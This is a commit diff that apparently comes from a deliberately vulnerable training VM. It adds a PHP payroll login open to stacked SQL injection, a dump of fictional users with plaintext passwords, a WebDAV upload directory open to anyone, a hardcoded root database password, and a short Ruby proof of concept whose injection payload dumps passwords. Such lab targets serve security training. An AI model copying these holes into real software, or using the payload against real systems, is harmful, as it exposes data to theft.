Resolve merge conflict in Vagrantfile
This commit is contained in:
commit
be04fc19d8
|
@ -170,6 +170,7 @@ Vagrant.configure("2") do |config|
|
|||
chef.add_recipe "metasploitable::samba"
|
||||
chef.add_recipe "metasploitable::unrealircd"
|
||||
chef.add_recipe "metasploitable::readme_app"
|
||||
chef.add_recipe "metasploitable::payroll_app"
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -0,0 +1,39 @@
|
|||
#
|
||||
# Distributed authoring and versioning (WebDAV)
|
||||
#
|
||||
# Required modules: mod_dav, mod_dav_fs, mod_setenvif, mod_alias
|
||||
# mod_auth_digest, mod_authn_file
|
||||
#
|
||||
|
||||
# The following example gives DAV write access to a directory called
|
||||
# "uploads" under the ServerRoot directory.
|
||||
#
|
||||
# The User/Group specified in httpd.conf needs to have write permissions
|
||||
# on the directory where the DavLockDB is placed and on any directory where
|
||||
# "Dav On" is specified.
|
||||
|
||||
Alias /uploads "/var/www/uploads"
|
||||
|
||||
<Directory "/var/www/uploads">
|
||||
AllowOverride All
|
||||
Dav On
|
||||
|
||||
<Limit GET HEAD POST DELETE OPTIONS PUT>
|
||||
Order Allow,Deny
|
||||
Allow from all
|
||||
</Limit>
|
||||
</Directory>
|
||||
|
||||
#
|
||||
# The following directives disable redirects on non-GET requests for
|
||||
# a directory that does not include the trailing slash. This fixes a
|
||||
# problem with several clients that do not appropriately handle
|
||||
# redirects for folders with DAV methods.
|
||||
#
|
||||
BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully
|
||||
BrowserMatch "MS FrontPage" redirect-carefully
|
||||
BrowserMatch "^WebDrive" redirect-carefully
|
||||
BrowserMatch "^WebDAVFS/1.[0123]" redirect-carefully
|
||||
BrowserMatch "^gnome-vfs/1.0" redirect-carefully
|
||||
BrowserMatch "^XML Spy" redirect-carefully
|
||||
BrowserMatch "^Dreamweaver-WebDAV-SCM1" redirect-carefully
|
|
@ -0,0 +1,60 @@
|
|||
-- phpMyAdmin SQL Dump
|
||||
-- version 3.5.8
|
||||
-- http://www.phpmyadmin.net
|
||||
--
|
||||
-- Host: 127.0.0.1
|
||||
-- Generation Time: Apr 10, 2017 at 04:42 PM
|
||||
-- Server version: 5.5.54-0ubuntu0.14.04.1
|
||||
-- PHP Version: 5.4.5
|
||||
|
||||
SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";
|
||||
SET time_zone = "+00:00";
|
||||
|
||||
|
||||
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
|
||||
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
|
||||
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
|
||||
/*!40101 SET NAMES utf8 */;
|
||||
|
||||
--
|
||||
-- Database: `payroll`
|
||||
--
|
||||
|
||||
-- --------------------------------------------------------
|
||||
|
||||
--
|
||||
-- Table structure for table `users`
|
||||
--
|
||||
|
||||
CREATE TABLE IF NOT EXISTS `users` (
|
||||
`username` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL,
|
||||
`first_name` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL,
|
||||
`last_name` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL,
|
||||
`password` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL,
|
||||
`salary` int(20) NOT NULL
|
||||
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
|
||||
|
||||
--
|
||||
-- Dumping data for table `users`
|
||||
--
|
||||
|
||||
INSERT INTO `users` (`username`, `first_name`, `last_name`, `password`, `salary`) VALUES
|
||||
('luke_skywalker', 'Luke', 'Skywalker', 'password', 102000),
|
||||
('leia_organa', 'Leia', 'Organa', 'obiwan', 95600),
|
||||
('han_solo', 'Han', 'Solo', 'sh00t-first', 12000),
|
||||
('artoo_detoo', 'Artoo', 'Detoo', 'beep_b00p', 22000),
|
||||
('c_three_pio', 'C', 'Threepio', 'pr0t0c0l', 32000),
|
||||
('ben_kenobi', 'Ben', 'Kenobi', 'thats_no_moon', 1000000),
|
||||
('darth_vader', 'Darth', 'Vader', 'd@rk_sid3', 666000),
|
||||
('anakin_skywalker', 'Anakin', 'Skywalker', 'yipp33!!', 0),
|
||||
('jarjar_binks', 'Jar-Jar', 'Binks', 'mesah_p@ssw0rd', 2000),
|
||||
('lando_calrissian', 'Lando', 'Calrissian', 'b@ckstab', 4000000),
|
||||
('boba_fett', 'Boba', 'Fett', 'mandalorian1', 2000000),
|
||||
('jabba_hutt', 'Jabba', 'The Hutt', 'not-a-slug12', 10000000),
|
||||
('greedo', 'Greedo', 'Rodian', 'hanShotFirst!', 500000),
|
||||
('chewbacca', 'Chewbacca', '', 'rwaaaaawr5', 4500),
|
||||
('kylo_ren', 'Kylo', 'Ren', 'daddy_issues1', 66600);
|
||||
|
||||
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
|
||||
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
|
||||
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
|
|
@ -0,0 +1,64 @@
|
|||
<?php
|
||||
|
||||
$conn = new mysqli('127.0.0.1', 'root', 'sploitme', 'payroll');
|
||||
if ($conn->connect_error) {
|
||||
die("Connection failed: " . $conn->connect_error);
|
||||
}
|
||||
?>
|
||||
|
||||
<?php
|
||||
if (!isset($_POST['s'])) {
|
||||
?>
|
||||
<center>
|
||||
<form action="" method="post">
|
||||
<h2>Payroll Login</h2>
|
||||
<table style="border-radius: 25px; border: 2px solid black; padding: 20px;">
|
||||
<tr>
|
||||
<td>User</td>
|
||||
<td><input type="text" name="user"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Password</td>
|
||||
<td><input type="password" name="password"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td><input type="submit" value="OK" name="s">
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
</center>
|
||||
<?php
|
||||
}
|
||||
?>
|
||||
|
||||
<?php
|
||||
if($_POST['s']){
|
||||
$user = $_POST['user'];
|
||||
$pass = $_POST['password'];
|
||||
$sql = "select username, first_name, last_name, salary from users where username = '$user' and password = '$pass'";
|
||||
|
||||
if ($conn->multi_query($sql)) {
|
||||
do {
|
||||
/* store first result set */
|
||||
echo "<center>";
|
||||
echo "<h2>Welcome, " . $user . "</h2><br>";
|
||||
echo "<table style='border-radius: 25px; border: 2px solid black;' cellspacing=30>";
|
||||
echo "<tr><th>Username</th><th>First Name</th><th>Last Name</th><th>Salary</th></tr>";
|
||||
if ($result = $conn->store_result()) {
|
||||
while ($row = $result->fetch_assoc()) {
|
||||
$keys = array_keys($row);
|
||||
echo "<tr>";
|
||||
foreach ($keys as $key) {
|
||||
echo "<td>" . $row[$key] . "</td>";
|
||||
}
|
||||
echo "</tr>\n";
|
||||
}
|
||||
$result->free();
|
||||
}
|
||||
if (!$conn->more_results()) {
|
||||
echo "</table></center>";
|
||||
}
|
||||
} while ($conn->next_result());
|
||||
}
|
||||
}
|
||||
?>
|
|
@ -0,0 +1,14 @@
|
|||
require 'net/http'
|
||||
|
||||
url = "http://127.0.0.1/payroll_app.php"
|
||||
uri = URI(url)
|
||||
user = 'luke_skywalker'
|
||||
injection = "password'; select password from users where username='' OR ''='"
|
||||
|
||||
puts "Making POST request to #{uri} with the following parameters:"
|
||||
puts "'user' = #{user}"
|
||||
puts "'password' = #{injection}"
|
||||
res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK')
|
||||
|
||||
puts "Response body is #{res.body}"
|
||||
puts "Done"
|
|
@ -17,6 +17,11 @@ directory '/var/www/cgi-bin' do
|
|||
recursive true
|
||||
end
|
||||
|
||||
directory '/var/www/uploads' do
|
||||
mode '0777'
|
||||
recursive true
|
||||
end
|
||||
|
||||
cookbook_file '/var/www/cgi-bin/hello_world.sh' do
|
||||
source 'apache/hello_world.sh'
|
||||
mode '0755'
|
||||
|
@ -27,16 +32,27 @@ cookbook_file '/etc/apache2/conf-available/cgi-bin.conf' do
|
|||
mode '0644'
|
||||
end
|
||||
|
||||
execute 'enable-cgi-mod' do
|
||||
command 'a2enmod cgi'
|
||||
cookbook_file '/etc/apache2/conf-available/dav.conf' do
|
||||
source 'apache/dav.conf'
|
||||
mode '0644'
|
||||
end
|
||||
|
||||
execute 'enable-cgi-bin-conf' do
|
||||
command 'a2enconf cgi-bin'
|
||||
bash "configure cgi" do
|
||||
code <<-EOH
|
||||
a2enmod cgi
|
||||
a2enconf cgi-bin
|
||||
a2disconf serve-cgi-bin
|
||||
EOH
|
||||
end
|
||||
|
||||
execute 'disable-serve-cgi-bin-conf' do
|
||||
command 'a2disconf serve-cgi-bin'
|
||||
bash "configure webDAV" do
|
||||
code <<-EOH
|
||||
a2enmod dav
|
||||
a2enmod dav_fs
|
||||
a2enmod dav_lock
|
||||
a2enmod auth_digest
|
||||
a2enconf dav
|
||||
EOH
|
||||
end
|
||||
|
||||
execute 'make /var/www/html writeable' do
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
#
|
||||
# Cookbook:: metasploitable
|
||||
# Recipe:: payroll_app
|
||||
# Copyright:: 2017, Rapid7, All Rights Reserved.
|
||||
|
||||
cookbook_file '/var/www/html/payroll_app.php' do
|
||||
source 'payroll_app/payroll_app.php'
|
||||
mode '0755'
|
||||
end
|
||||
|
||||
cookbook_file '/tmp/payroll.sql' do
|
||||
source 'payroll_app/payroll.sql'
|
||||
mode '0755'
|
||||
end
|
||||
|
||||
directory '/home/vagrant/poc/payroll_app/' do
|
||||
mode '0755'
|
||||
owner 'vagrant'
|
||||
recursive true
|
||||
end
|
||||
|
||||
cookbook_file '/home/vagrant/poc/payroll_app/poc.rb' do
|
||||
source 'payroll_app/poc.rb'
|
||||
mode '0755'
|
||||
end
|
||||
|
||||
bash 'create payroll database and import data' do
|
||||
code <<-EOH
|
||||
mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" --execute="CREATE DATABASE payroll;"
|
||||
mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" payroll < /tmp/payroll.sql
|
||||
EOH
|
||||
end
|
|
@ -35,7 +35,7 @@ end
|
|||
bash "compile and install php" do
|
||||
code <<-EOH
|
||||
cd /home/vagrant/php-5.4.5
|
||||
./configure --with-apxs2=/usr/bin/apxs --with-mysql
|
||||
./configure --with-apxs2=/usr/bin/apxs --with-mysqli --enable-embedded-mysqli
|
||||
make
|
||||
make install
|
||||
EOH
|
||||
|
|
Loading…
Reference in New Issue